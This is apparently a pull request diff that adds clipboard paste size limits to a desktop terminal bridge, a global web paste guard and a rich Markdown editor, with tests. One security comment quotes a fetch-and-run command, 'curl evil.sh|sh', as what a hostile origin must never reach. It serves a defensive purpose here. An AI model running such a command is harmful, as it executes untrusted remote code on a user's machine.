### PR TITLE
fix(ui): optimize universal paste handling

### DIFF
--- a/apps/desktop/src/main/ipc.test.ts
+++ b/apps/desktop/src/main/ipc.test.ts
@@ -1,5 +1,6 @@
 import { readFileSync } from 'node:fs'
 import { fileURLToPath } from 'node:url'
+import { PASTE_LIMITS } from '@sim/utils/paste'
 import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'
 
 vi.mock('electron', () => import('@/test/electron-mock'))
@@ -1693,6 +1694,28 @@ describe('registerIpcHandlers', () => {
     vi.mocked(clipboard.readText).mockReturnValue('')
     expect(await invoke.get('terminal:paste')?.(activeAppEvent, 't1', 'chat-a')).toBe(false)
     expect(write).not.toHaveBeenCalled()
+  })
+
+  it('rejects an oversized terminal paste before writing to the PTY', async () => {
+    const { invoke } = collectHandlers()
+    const write = vi.spyOn(deps.terminal, 'write').mockImplementation(() => {})
+    vi.mocked(clipboard.readText).mockReturnValue('x'.repeat(PASTE_LIMITS.TERMINAL_BYTES + 1))
+
+    await expect(invoke.get('terminal:paste')?.(activeAppEvent, 't1', 'chat-a')).resolves.toBe(
+      'too-large'
+    )
+    expect(write).not.toHaveBeenCalled()
+  })
+
+  it('writes an admitted terminal paste in bounded chunks', async () => {
+    const { invoke } = collectHandlers()
+    const write = vi.spyOn(deps.terminal, 'write').mockImplementation(() => {})
+    const text = 'x'.repeat(70 * 1024)
+    vi.mocked(clipboard.readText).mockReturnValue(text)
+
+    await expect(invoke.get('terminal:paste')?.(activeAppEvent, 't1', 'chat-a')).resolves.toBe(true)
+    expect(write).toHaveBeenCalledTimes(2)
+    expect(write.mock.calls.map((call) => call[2]).join('')).toBe(text)
   })
 
   it('gates a command smuggled inside a fake OSC or DCS reply', () => {

--- a/apps/desktop/src/main/ipc.ts
+++ b/apps/desktop/src/main/ipc.ts
@@ -27,6 +27,7 @@ import {
 } from '@sim/terminal-protocol'
 import { getErrorMessage } from '@sim/utils/errors'
 import { isRecordLike } from '@sim/utils/object'
+import { PASTE_LIMITS, utf8ByteLength } from '@sim/utils/paste'
 import type { BrowserWindow, IpcMainEvent, IpcMainInvokeEvent, WebContents } from 'electron'
 import { clipboard, ipcMain, shell } from 'electron'
 import {
@@ -90,6 +91,23 @@ const logger = createLogger('DesktopIpc')
 
 /** Workspace/chat ids are opaque tokens; anything else never reaches a URL. */
 const ID_PATTERN = /^[A-Za-z0-9_-]{1,128}$/
+const TERMINAL_WRITE_CHUNK_CHARACTERS = 64 * 1024
+
+function writeTerminalText(
+  terminal: TerminalRegistry,
+  scope: string,
+  terminalId: string,
+  text: string
+): void {
+  let start = 0
+  while (start < text.length) {
+    let end = Math.min(start + TERMINAL_WRITE_CHUNK_CHARACTERS, text.length)
+    const finalCode = text.charCodeAt(end - 1)
+    if (end < text.length && finalCode >= 0xd800 && finalCode <= 0xdbff) end -= 1
+    terminal.write(scope, terminalId, text.slice(start, end))
+    start = end
+  }
+}
 
 const MICROPHONE_SETTINGS_URLS: Partial<Record<NodeJS.Platform, string>> = {
   darwin: 'x-apple.systempreferences:com.apple.preference.security?Privacy_Microphone',
@@ -1546,7 +1564,10 @@ export function registerIpcHandlers(deps: IpcDeps): void {
         if (!scope || typeof terminalId !== 'string') return false
         const text = clipboard.readText()
         if (!text) return false
-        deps.terminal.write(scope, terminalId, text)
+        if (utf8ByteLength(text, PASTE_LIMITS.TERMINAL_BYTES) > PASTE_LIMITS.TERMINAL_BYTES) {
+          return 'too-large'
+        }
+        writeTerminalText(deps.terminal, scope, terminalId, text)
         return true
       },
     },
@@ -1735,7 +1756,8 @@ export function registerIpcHandlers(deps: IpcDeps): void {
       handler: (sender, terminalId, data, rawScope) => {
         const scope = rendererScope(terminalScopeBySender, sender as WebContents, rawScope)
         if (!scope || typeof terminalId !== 'string' || typeof data !== 'string') return
-        deps.terminal.write(scope, terminalId, data)
+        if (utf8ByteLength(data, PASTE_LIMITS.TERMINAL_BYTES) > PASTE_LIMITS.TERMINAL_BYTES) return
+        writeTerminalText(deps.terminal, scope, terminalId, data)
       },
       // An XSS'd or hostile origin must not reach `write(id, 'curl evil.sh|sh\r')`.
       // Panel focus is deliberately not used — `terminal:focused` is a

--- a/apps/desktop/src/preload/index.ts
+++ b/apps/desktop/src/preload/index.ts
@@ -456,7 +456,7 @@ const api: SimDesktopApi = {
     write: (terminalId: string, data: string, scopeId: string): void => {
       ipcRenderer.send('terminal:write', terminalId, data, scopeId)
     },
-    paste: (terminalId: string, scopeId: string): Promise<boolean> =>
+    paste: (terminalId: string, scopeId: string) =>
       ipcRenderer.invoke('terminal:paste', terminalId, scopeId),
     resize: (terminalId: string, cols: number, rows: number, scopeId: string): void => {
       ipcRenderer.send('terminal:resize', terminalId, cols, rows, scopeId)

--- a/apps/realtime/src/config/socket.ts
+++ b/apps/realtime/src/config/socket.ts
@@ -11,8 +11,11 @@ const logger = createLogger('SocketIOConfig')
 const PING_TIMEOUT_MS = 60000
 /** Socket.IO ping interval - how often to send ping packets */
 const PING_INTERVAL_MS = 25000
-/** Maximum HTTP buffer size for Socket.IO messages */
-const MAX_HTTP_BUFFER_SIZE = 1e6
+/**
+ * Accommodates the existing 5 MiB collaborative-document boundary plus Yjs and Socket.IO framing.
+ * This remains a transport safety hatch, not a product-sized text limit.
+ */
+const MAX_HTTP_BUFFER_SIZE = 8 * 1024 * 1024
 
 let adapterPubClient: RedisClientType | null = null
 let adapterSubClient: RedisClientType | null = null

--- a/apps/sim/app/_shell/paste-admission-guard.test.tsx
+++ b/apps/sim/app/_shell/paste-admission-guard.test.tsx
@@ -1,0 +1,93 @@
+/**
+ * @vitest-environment jsdom
+ */
+import { act } from 'react'
+import { createRoot, type Root } from 'react-dom/client'
+import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'
+
+const { warning } = vi.hoisted(() => ({ warning: vi.fn() }))
+
+vi.mock('@sim/emcn', () => ({
+  useToast: () => ({ toast: { warning } }),
+}))
+
+import { PasteAdmissionGuard } from '@/app/_shell/paste-admission-guard'
+
+let host: HTMLDivElement
+let root: Root
+
+function dispatchPaste(target: Element, text: string): Event {
+  const event = new Event('paste', { bubbles: true, cancelable: true, composed: true })
+  Object.defineProperty(event, 'clipboardData', {
+    value: { getData: (type: string) => (type === 'text/plain' ? text : '') },
+  })
+  target.dispatchEvent(event)
+  return event
+}
+
+beforeEach(() => {
+  host = document.createElement('div')
+  document.body.appendChild(host)
+  root = createRoot(host)
+  act(() => root.render(<PasteAdmissionGuard />))
+})
+
+afterEach(() => {
+  act(() => root.unmount())
+  host.remove()
+  vi.clearAllMocks()
+})
+
+describe('PasteAdmissionGuard', () => {
+  it('rejects an oversized native paste before the target handler runs', () => {
+    const input = document.createElement('textarea')
+    input.dataset.pasteMaxBytes = '4'
+    host.appendChild(input)
+    const targetHandler = vi.fn()
+    input.addEventListener('paste', targetHandler)
+
+    const event = dispatchPaste(input, '12345')
+
+    expect(event.defaultPrevented).toBe(true)
+    expect(targetHandler).not.toHaveBeenCalled()
+    expect(warning).toHaveBeenCalledOnce()
+  })
+
+  it('uses projected native value size and accounts for the selection', () => {
+    const input = document.createElement('textarea')
+    input.dataset.pasteMaxBytes = '6'
+    input.value = '123456'
+    host.appendChild(input)
+
+    input.setSelectionRange(1, 5)
+    expect(dispatchPaste(input, 'abcd').defaultPrevented).toBe(false)
+
+    input.setSelectionRange(6, 6)
+    expect(dispatchPaste(input, 'a').defaultPrevented).toBe(true)
+  })
+
+  it('honors a surface-specific character contract', () => {
+    const input = document.createElement('textarea')
+    input.dataset.pasteMaxBytes = '100'
+    input.dataset.pasteMaxCharacters = '2'
+    host.appendChild(input)
+
+    expect(dispatchPaste(input, '💡💡').defaultPrevented).toBe(true)
+  })
+
+  it('uses a contenteditable selection when projecting the result', () => {
+    const editable = document.createElement('div')
+    editable.contentEditable = 'true'
+    editable.dataset.pasteMaxBytes = '6'
+    editable.textContent = '123456'
+    host.appendChild(editable)
+    const range = document.createRange()
+    range.setStart(editable.firstChild as Text, 1)
+    range.setEnd(editable.firstChild as Text, 5)
+    const selection = document.getSelection()
+    selection?.removeAllRanges()
+    selection?.addRange(range)
+
+    expect(dispatchPaste(editable, 'abcd').defaultPrevented).toBe(false)
+  })
+})

--- a/apps/sim/app/_shell/paste-admission-guard.test.tsx
+++ b/apps/sim/app/_shell/paste-admission-guard.test.tsx
@@ -11,15 +11,26 @@ vi.mock('@sim/emcn', () => ({
   useToast: () => ({ toast: { warning } }),
 }))
 
+import { SIM_SELECTION_MIME } from '@/lib/copilot/chat/selection-clipboard'
 import { PasteAdmissionGuard } from '@/app/_shell/paste-admission-guard'
 
 let host: HTMLDivElement
 let root: Root
 
-function dispatchPaste(target: Element, text: string): Event {
-  const event = new Event('paste', { bubbles: true, cancelable: true, composed: true })
+function dispatchPaste(target: Element, text: string, selectionContext?: string): Event {
+  const event = new Event('paste', {
+    bubbles: true,
+    cancelable: true,
+    composed: true,
+  })
   Object.defineProperty(event, 'clipboardData', {
-    value: { getData: (type: string) => (type === 'text/plain' ? text : '') },
+    value: {
+      getData: (type: string) => {
+        if (type === 'text/plain') return text
+        if (type === SIM_SELECTION_MIME) return selectionContext ?? ''
+        return ''
+      },
+    },
   })
   target.dispatchEvent(event)
   return event
@@ -80,5 +91,20 @@ describe('PasteAdmissionGuard', () => {
     host.appendChild(editable)
 
     expect(dispatchPaste(editable, 'a').defaultPrevented).toBe(false)
+  })
+
+  it('lets a compact Sim selection reference bypass its large plain-text representation', () => {
+    const input = document.createElement('textarea')
+    input.dataset.pasteMaxBytes = '4'
+    host.appendChild(input)
+    const selectionContext = JSON.stringify({
+      kind: 'table_selection',
+      tableId: 'table-1',
+      tableName: 'Large table',
+      rowIds: ['row-1'],
+      label: 'Large table (1 row)',
+    })
+
+    expect(dispatchPaste(input, '12345', selectionContext).defaultPrevented).toBe(false)
   })
 })

--- a/apps/sim/app/_shell/paste-admission-guard.test.tsx
+++ b/apps/sim/app/_shell/paste-admission-guard.test.tsx
@@ -53,17 +53,14 @@ describe('PasteAdmissionGuard', () => {
     expect(warning).toHaveBeenCalledOnce()
   })
 
-  it('uses projected native value size and accounts for the selection', () => {
+  it('does not reject a small payload because the existing native value is large', () => {
     const input = document.createElement('textarea')
     input.dataset.pasteMaxBytes = '6'
     input.value = '123456'
     host.appendChild(input)
 
-    input.setSelectionRange(1, 5)
-    expect(dispatchPaste(input, 'abcd').defaultPrevented).toBe(false)
-
     input.setSelectionRange(6, 6)
-    expect(dispatchPaste(input, 'a').defaultPrevented).toBe(true)
+    expect(dispatchPaste(input, 'a').defaultPrevented).toBe(false)
   })
 
   it('honors a surface-specific character contract', () => {
@@ -75,19 +72,13 @@ describe('PasteAdmissionGuard', () => {
     expect(dispatchPaste(input, '💡💡').defaultPrevented).toBe(true)
   })
 
-  it('uses a contenteditable selection when projecting the result', () => {
+  it('does not reject a small payload because contenteditable text is already large', () => {
     const editable = document.createElement('div')
     editable.contentEditable = 'true'
     editable.dataset.pasteMaxBytes = '6'
     editable.textContent = '123456'
     host.appendChild(editable)
-    const range = document.createRange()
-    range.setStart(editable.firstChild as Text, 1)
-    range.setEnd(editable.firstChild as Text, 5)
-    const selection = document.getSelection()
-    selection?.removeAllRanges()
-    selection?.addRange(range)
 
-    expect(dispatchPaste(editable, 'abcd').defaultPrevented).toBe(false)
+    expect(dispatchPaste(editable, 'a').defaultPrevented).toBe(false)
   })
 })

--- a/apps/sim/app/_shell/paste-admission-guard.tsx
+++ b/apps/sim/app/_shell/paste-admission-guard.tsx
@@ -3,6 +3,7 @@
 import { useEffect, useRef } from 'react'
 import { useToast } from '@sim/emcn'
 import { assessTextPaste, formatPasteLimit, PASTE_LIMITS } from '@sim/utils/paste'
+import { readSelectionContextFromClipboard } from '@/lib/copilot/chat/selection-clipboard'
 
 const EDITABLE_TARGET_SELECTOR =
   'input:not([type="file"]):not([type="checkbox"]):not([type="radio"]):not([type="button"]):not([type="submit"]):not([type="hidden"]), textarea, [contenteditable]:not([contenteditable="false"]), .monaco-editor, .xterm'
@@ -31,6 +32,8 @@ export function PasteAdmissionGuard() {
       if (!(event.target instanceof Element) || !event.target.closest(EDITABLE_TARGET_SELECTOR)) {
         return
       }
+
+      if (readSelectionContextFromClipboard(event.clipboardData)) return
 
       const text = event.clipboardData?.getData('text/plain') ?? ''
       if (!text) return

--- a/apps/sim/app/_shell/paste-admission-guard.tsx
+++ b/apps/sim/app/_shell/paste-admission-guard.tsx
@@ -14,38 +14,12 @@ function finitePositiveAttribute(element: Element | null, name: string): number 
   return Number.isFinite(value) && value > 0 ? value : undefined
 }
 
-function contentEditableSelection(element: HTMLElement): {
-  currentText: string
-  selectionStart: number
-  selectionEnd: number
-} {
-  const currentText = element.textContent ?? ''
-  const selection = document.getSelection()
-  if (!selection || selection.rangeCount === 0) {
-    return { currentText, selectionStart: currentText.length, selectionEnd: currentText.length }
-  }
-
-  const range = selection.getRangeAt(0)
-  if (!element.contains(range.startContainer) || !element.contains(range.endContainer)) {
-    return { currentText, selectionStart: currentText.length, selectionEnd: currentText.length }
-  }
-
-  const before = document.createRange()
-  before.selectNodeContents(element)
-  before.setEnd(range.startContainer, range.startOffset)
-  const selectionStart = before.toString().length
-  return {
-    currentText,
-    selectionStart,
-    selectionEnd: selectionStart + range.toString().length,
-  }
-}
-
 /**
- * Last-resort admission for every editable workspace surface. Specialized editors publish a larger
- * or smaller payload ceiling on an ancestor with `data-paste-max-bytes`; controls without one inherit
- * the Socket.IO-sized default. The capture listener runs before React, ProseMirror, Monaco, and xterm
- * can parse or render the clipboard value.
+ * Last-resort admission for every editable workspace surface. Specialized editors publish their
+ * downstream ceiling on an ancestor with `data-paste-max-bytes`; controls without one inherit a
+ * crash-only fallback. This layer bounds only the clipboard payload, so a small paste into an already
+ * large field keeps native behavior. Editors with a real result-size contract enforce it themselves.
+ * The capture listener runs before React, ProseMirror, Monaco, and xterm parse the clipboard value.
  */
 export function PasteAdmissionGuard() {
   const { toast: notify } = useToast()
@@ -68,31 +42,10 @@ export function PasteAdmissionGuard() {
         policyElement,
         'data-paste-max-characters'
       )
-      const nativeControl =
-        event.target instanceof HTMLInputElement || event.target instanceof HTMLTextAreaElement
-      const editableElement = event.target.closest<HTMLElement>(
-        '[contenteditable]:not([contenteditable="false"])'
-      )
-      const projectedValue = nativeControl
-        ? {
-            currentText: event.target.value,
-            selectionStart: event.target.selectionStart ?? event.target.value.length,
-            selectionEnd: event.target.selectionEnd ?? event.target.value.length,
-          }
-        : editableElement
-          ? contentEditableSelection(editableElement)
-          : null
       const admission = assessTextPaste({
         pastedText: text,
         maxPastedBytes,
         maxPastedCharacters,
-        ...(projectedValue
-          ? {
-              ...projectedValue,
-              maxResultBytes: maxPastedBytes,
-              maxResultCharacters: maxPastedCharacters,
-            }
-          : {}),
       })
       if (admission.accepted) return
 

--- a/apps/sim/app/_shell/paste-admission-guard.tsx
+++ b/apps/sim/app/_shell/paste-admission-guard.tsx
@@ -1,0 +1,115 @@
+'use client'
+
+import { useEffect, useRef } from 'react'
+import { useToast } from '@sim/emcn'
+import { assessTextPaste, formatPasteLimit, PASTE_LIMITS } from '@sim/utils/paste'
+
+const EDITABLE_TARGET_SELECTOR =
+  'input:not([type="file"]):not([type="checkbox"]):not([type="radio"]):not([type="button"]):not([type="submit"]):not([type="hidden"]), textarea, [contenteditable]:not([contenteditable="false"]), .monaco-editor, .xterm'
+
+function finitePositiveAttribute(element: Element | null, name: string): number | undefined {
+  const raw = element?.getAttribute(name)
+  if (!raw) return undefined
+  const value = Number(raw)
+  return Number.isFinite(value) && value > 0 ? value : undefined
+}
+
+function contentEditableSelection(element: HTMLElement): {
+  currentText: string
+  selectionStart: number
+  selectionEnd: number
+} {
+  const currentText = element.textContent ?? ''
+  const selection = document.getSelection()
+  if (!selection || selection.rangeCount === 0) {
+    return { currentText, selectionStart: currentText.length, selectionEnd: currentText.length }
+  }
+
+  const range = selection.getRangeAt(0)
+  if (!element.contains(range.startContainer) || !element.contains(range.endContainer)) {
+    return { currentText, selectionStart: currentText.length, selectionEnd: currentText.length }
+  }
+
+  const before = document.createRange()
+  before.selectNodeContents(element)
+  before.setEnd(range.startContainer, range.startOffset)
+  const selectionStart = before.toString().length
+  return {
+    currentText,
+    selectionStart,
+    selectionEnd: selectionStart + range.toString().length,
+  }
+}
+
+/**
+ * Last-resort admission for every editable workspace surface. Specialized editors publish a larger
+ * or smaller payload ceiling on an ancestor with `data-paste-max-bytes`; controls without one inherit
+ * the Socket.IO-sized default. The capture listener runs before React, ProseMirror, Monaco, and xterm
+ * can parse or render the clipboard value.
+ */
+export function PasteAdmissionGuard() {
+  const { toast: notify } = useToast()
+  const notifyRef = useRef(notify)
+  notifyRef.current = notify
+
+  useEffect(() => {
+    const handlePaste = (event: ClipboardEvent) => {
+      if (!(event.target instanceof Element) || !event.target.closest(EDITABLE_TARGET_SELECTOR)) {
+        return
+      }
+
+      const text = event.clipboardData?.getData('text/plain') ?? ''
+      if (!text) return
+
+      const policyElement = event.target.closest('[data-paste-max-bytes]')
+      const maxPastedBytes =
+        finitePositiveAttribute(policyElement, 'data-paste-max-bytes') ?? PASTE_LIMITS.DEFAULT_BYTES
+      const maxPastedCharacters = finitePositiveAttribute(
+        policyElement,
+        'data-paste-max-characters'
+      )
+      const nativeControl =
+        event.target instanceof HTMLInputElement || event.target instanceof HTMLTextAreaElement
+      const editableElement = event.target.closest<HTMLElement>(
+        '[contenteditable]:not([contenteditable="false"])'
+      )
+      const projectedValue = nativeControl
+        ? {
+            currentText: event.target.value,
+            selectionStart: event.target.selectionStart ?? event.target.value.length,
+            selectionEnd: event.target.selectionEnd ?? event.target.value.length,
+          }
+        : editableElement
+          ? contentEditableSelection(editableElement)
+          : null
+      const admission = assessTextPaste({
+        pastedText: text,
+        maxPastedBytes,
+        maxPastedCharacters,
+        ...(projectedValue
+          ? {
+              ...projectedValue,
+              maxResultBytes: maxPastedBytes,
+              maxResultCharacters: maxPastedCharacters,
+            }
+          : {}),
+      })
+      if (admission.accepted) return
+
+      event.preventDefault()
+      event.stopImmediatePropagation()
+      const limit =
+        admission.reason === 'pasted-characters'
+          ? `${admission.limit.toLocaleString()} characters`
+          : formatPasteLimit(admission.limit)
+      notifyRef.current.warning('Paste is too large for this editor', {
+        description: `The clipboard content was left unchanged. This editor supports up to ${limit}.`,
+      })
+    }
+
+    document.addEventListener('paste', handlePaste, true)
+    return () => document.removeEventListener('paste', handlePaste, true)
+  }, [])
+
+  return null
+}

--- a/apps/sim/app/credential-groups/enroll/[token]/page.tsx
+++ b/apps/sim/app/credential-groups/enroll/[token]/page.tsx
@@ -1,5 +1,5 @@
 import { type ReactNode, Suspense } from 'react'
-import { Chip, ToastProvider } from '@sim/emcn'
+import { Chip } from '@sim/emcn'
 import type { Metadata } from 'next'
 import { headers } from 'next/headers'
 import { asOrchestrationError } from '@/lib/core/orchestration/types'
@@ -35,13 +35,11 @@ interface PageShellProps {
 
 function PageShell({ children }: PageShellProps) {
   return (
-    <ToastProvider>
-      <LogoShell footer={<SupportFooter position='static' />}>
-        <div className='mx-auto flex w-full max-w-[640px] flex-1 flex-col px-5 pt-16 pb-20 max-sm:pt-10'>
-          {children}
-        </div>
-      </LogoShell>
-    </ToastProvider>
+    <LogoShell footer={<SupportFooter position='static' />}>
+      <div className='mx-auto flex w-full max-w-[640px] flex-1 flex-col px-5 pt-16 pb-20 max-sm:pt-10'>
+        {children}
+      </div>
+    </LogoShell>
   )
 }
 

--- a/apps/sim/app/layout.tsx
+++ b/apps/sim/app/layout.tsx
@@ -1,8 +1,10 @@
+import { ToastProvider } from '@sim/emcn'
 import type { Metadata, Viewport } from 'next'
 import Script from 'next/script'
 import { PublicEnvScript as RuntimePublicEnvScript } from 'next-runtime-env'
 import { NuqsAdapter } from 'nuqs/adapters/next/app'
 import { BrandedLayout } from '@/components/branded-layout'
+import { PasteAdmissionGuard } from '@/app/_shell/paste-admission-guard'
 import { PostHogProvider } from '@/app/_shell/providers/posthog-provider'
 import { generateBrandedMetadata, generateThemeCSS } from '@/ee/whitelabeling'
 import '@/app/_styles/globals.css'
@@ -36,17 +38,20 @@ export const metadata: Metadata = generateBrandedMetadata()
 export default function RootLayout({ children }: { children: React.ReactNode }) {
   const themeCSS = generateThemeCSS()
   const application = (
-    <PostHogProvider consentRequired={isHosted}>
-      <ThemeProvider>
-        <QueryProvider>
-          <SessionProvider>
-            <TooltipProvider>
-              <BrandedLayout>{children}</BrandedLayout>
-            </TooltipProvider>
-          </SessionProvider>
-        </QueryProvider>
-      </ThemeProvider>
-    </PostHogProvider>
+    <ToastProvider>
+      <PasteAdmissionGuard />
+      <PostHogProvider consentRequired={isHosted}>
+        <ThemeProvider>
+          <QueryProvider>
+            <SessionProvider>
+              <TooltipProvider>
+                <BrandedLayout>{children}</BrandedLayout>
+              </TooltipProvider>
+            </SessionProvider>
+          </QueryProvider>
+        </ThemeProvider>
+      </PostHogProvider>
+    </ToastProvider>
   )
 
   return (

--- a/apps/sim/app/playground/page.tsx
+++ b/apps/sim/app/playground/page.tsx
@@ -74,7 +74,6 @@ import {
   type TagItem,
   Textarea,
   TimePicker,
-  ToastProvider,
   Tooltip,
   Trash,
   toast,
@@ -163,7 +162,7 @@ export default function PlaygroundPage() {
   }
 
   return (
-    <ToastProvider>
+    <>
       <Tooltip.Provider>
         <div className='relative min-h-screen bg-[var(--bg)] p-8'>
           <div className='absolute top-8 left-8 flex items-center gap-2'>
@@ -1066,6 +1065,6 @@ export default function PlaygroundPage() {
           </div>
         </div>
       </Tooltip.Provider>
-    </ToastProvider>
+    </>
   )
 }

--- a/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/editor-extensions.ts
+++ b/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/editor-extensions.ts
@@ -20,6 +20,10 @@ import { RichMarkdownKeymap } from './keymap'
 import { MarkdownPaste } from './markdown-paste'
 import { Mention } from './mention/mention'
 import { MentionChip } from './mention/mention-chip'
+import {
+  createRichMarkdownPasteAdmission,
+  type RichMarkdownPasteAdmissionOptions,
+} from './paste-admission'
 import { FootnoteDefWithView, RawHtmlBlockWithView } from './raw-markdown-snippet'
 import { SlashCommand } from './slash-command/slash-command'
 
@@ -37,6 +41,7 @@ interface MarkdownEditorExtensionOptions {
   embeds?: boolean
   /** When set, wires TipTap Collaboration + CollaborationCaret onto the shared document. */
   collaboration?: EditorCollaboration
+  pasteAdmission?: RichMarkdownPasteAdmissionOptions
 }
 
 /**
@@ -53,6 +58,7 @@ export function createMarkdownEditorExtensions({
   placeholder,
   embeds = false,
   collaboration,
+  pasteAdmission,
 }: MarkdownEditorExtensionOptions): Extensions {
   return [
     ...createMarkdownContentExtensions(
@@ -92,6 +98,7 @@ export function createMarkdownEditorExtensions({
     Mention,
     RichMarkdownKeymap,
     BlockMover,
+    ...(pasteAdmission ? [createRichMarkdownPasteAdmission(pasteAdmission)] : []),
     MarkdownPaste,
     Placeholder.configure({ placeholder }),
     ...(embeds ? [LinkEmbed] : []),

--- a/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/paste-admission.test.ts
+++ b/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/paste-admission.test.ts
@@ -1,0 +1,91 @@
+/**
+ * @vitest-environment jsdom
+ */
+import { Editor } from '@tiptap/core'
+import { TextSelection } from '@tiptap/pm/state'
+import { afterEach, describe, expect, it, vi } from 'vitest'
+import { createMarkdownContentExtensions } from './extensions'
+import { createRichMarkdownPasteAdmission } from './paste-admission'
+
+let editor: Editor | null = null
+
+afterEach(() => {
+  editor?.destroy()
+  editor = null
+})
+
+function runPaste(ed: Editor, text: string): { handled: boolean; prevented: boolean } {
+  let prevented = false
+  const event = {
+    clipboardData: { getData: (type: string) => (type === 'text/plain' ? text : '') },
+    preventDefault: () => {
+      prevented = true
+    },
+  } as unknown as ClipboardEvent
+
+  for (const plugin of ed.view.state.plugins) {
+    const handler = plugin.props.handleDOMEvents?.paste
+    if (handler?.(ed.view, event)) return { handled: true, prevented }
+  }
+  return { handled: false, prevented }
+}
+
+describe('rich Markdown paste admission', () => {
+  it('rejects before downstream paste parsing when projected bytes exceed the document limit', () => {
+    const onRejected = vi.fn()
+    editor = new Editor({
+      extensions: [
+        ...createMarkdownContentExtensions(),
+        createRichMarkdownPasteAdmission({
+          maxResultBytes: 10,
+          getCurrentText: () => '123456',
+          onRejected,
+        }),
+      ],
+      content: '<p>123456</p>',
+    })
+
+    expect(runPaste(editor, 'abcde')).toEqual({ handled: true, prevented: true })
+    expect(onRejected).toHaveBeenCalledOnce()
+  })
+
+  it('allows replacing a selection without treating the paste as an append', () => {
+    editor = new Editor({
+      extensions: [
+        ...createMarkdownContentExtensions(),
+        createRichMarkdownPasteAdmission({
+          maxResultBytes: 10,
+          getCurrentText: () => '123456',
+          onRejected: vi.fn(),
+        }),
+      ],
+      content: '<p>123456</p>',
+    })
+    editor.view.dispatch(
+      editor.view.state.tr.setSelection(TextSelection.create(editor.view.state.doc, 1, 7))
+    )
+
+    expect(runPaste(editor, '1234567890')).toEqual({ handled: false, prevented: false })
+  })
+
+  it('allows replacing an entire formatted document up to the limit', () => {
+    editor = new Editor({
+      extensions: [
+        ...createMarkdownContentExtensions(),
+        createRichMarkdownPasteAdmission({
+          maxResultBytes: 10,
+          getCurrentText: () => '**123456**',
+          onRejected: vi.fn(),
+        }),
+      ],
+      content: '<p><strong>123456</strong></p>',
+    })
+    editor.view.dispatch(
+      editor.view.state.tr.setSelection(
+        TextSelection.create(editor.view.state.doc, 1, editor.view.state.doc.content.size - 1)
+      )
+    )
+
+    expect(runPaste(editor, '1234567890')).toEqual({ handled: false, prevented: false })
+  })
+})

--- a/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/paste-admission.ts
+++ b/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/paste-admission.ts
@@ -34,9 +34,14 @@ export function createRichMarkdownPasteAdmission({
                 const currentText = getCurrentText()
                 const { from, to } = view.state.selection
                 const replacedText = view.state.doc.textBetween(from, to, '\n')
+                const replacesWholeDocument = from <= 1 && to >= view.state.doc.content.size - 1
+                const projectedCharacters = replacesWholeDocument
+                  ? pastedText.length
+                  : Math.max(0, currentText.length - replacedText.length) + pastedText.length
+                if (projectedCharacters <= Math.floor(maxResultBytes / 3)) return false
+
                 const currentBytes = utf8ByteLength(currentText, maxResultBytes)
                 const pastedBytes = utf8ByteLength(pastedText, maxResultBytes)
-                const replacesWholeDocument = from <= 1 && to >= view.state.doc.content.size - 1
                 const replacedBytes = replacesWholeDocument
                   ? currentBytes
                   : utf8ByteLength(replacedText, maxResultBytes)

--- a/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/paste-admission.ts
+++ b/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/paste-admission.ts
@@ -1,0 +1,56 @@
+import { utf8ByteLength } from '@sim/utils/paste'
+import { Extension } from '@tiptap/core'
+import { Plugin } from '@tiptap/pm/state'
+
+export interface RichMarkdownPasteAdmissionOptions {
+  maxResultBytes: number
+  getCurrentText: () => string
+  onRejected: () => void
+}
+
+/**
+ * Rejects a paste before Markdown parsing when its projected document would leave the editor's
+ * supported collaboration envelope. The selected ProseMirror text is subtracted from the current
+ * Markdown size, so replacing a large selection is admitted instead of being treated as an append.
+ */
+export function createRichMarkdownPasteAdmission({
+  maxResultBytes,
+  getCurrentText,
+  onRejected,
+}: RichMarkdownPasteAdmissionOptions): Extension {
+  return Extension.create({
+    name: 'richMarkdownPasteAdmission',
+    priority: 1_000,
+
+    addProseMirrorPlugins() {
+      return [
+        new Plugin({
+          props: {
+            handleDOMEvents: {
+              paste: (view, event) => {
+                const pastedText = event.clipboardData?.getData('text/plain') ?? ''
+                if (!pastedText) return false
+
+                const currentText = getCurrentText()
+                const { from, to } = view.state.selection
+                const replacedText = view.state.doc.textBetween(from, to, '\n')
+                const currentBytes = utf8ByteLength(currentText, maxResultBytes)
+                const pastedBytes = utf8ByteLength(pastedText, maxResultBytes)
+                const replacesWholeDocument = from <= 1 && to >= view.state.doc.content.size - 1
+                const replacedBytes = replacesWholeDocument
+                  ? currentBytes
+                  : utf8ByteLength(replacedText, maxResultBytes)
+                const projectedBytes = Math.max(0, currentBytes - replacedBytes) + pastedBytes
+                if (projectedBytes <= maxResultBytes) return false
+
+                event.preventDefault()
+                onRejected()
+                return true
+              },
+            },
+          },
+        }),
+      ]
+    },
+  })
+}

--- a/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/rich-markdown-editor.tsx
+++ b/apps/sim/app/workspace/[workspaceId]/files/components/file-viewer/rich-markdown-editor/rich-markdown-editor.tsx
@@ -3,6 +3,7 @@
 import { memo, useCallback, useEffect, useRef, useState } from 'react'
 import { cn, toast } from '@sim/emcn'
 import { FILE_DOC_SEED, type JoinFileDocError } from '@sim/realtime-protocol/file-doc'
+import { formatPasteLimit, PASTE_LIMITS } from '@sim/utils/paste'
 import type { Extensions, JSONContent } from '@tiptap/core'
 import { isChangeOrigin } from '@tiptap/extension-collaboration'
 import type { Editor } from '@tiptap/react'
@@ -72,6 +73,12 @@ const STREAM_REPARSE_THROTTLE_MS = 120
 
 /** Debounce before naming a still-untitled file after its leading heading, so it fires once typing settles. */
 const DERIVE_TITLE_DEBOUNCE_MS = 600
+
+function warnRichMarkdownPasteLimit() {
+  toast.warning('Paste is too large for rich-text editing', {
+    description: `Keep this document under ${formatPasteLimit(PASTE_LIMITS.RICH_MARKDOWN_BYTES)}, or import the content as a file and open it read-only.`,
+  })
+}
 
 /**
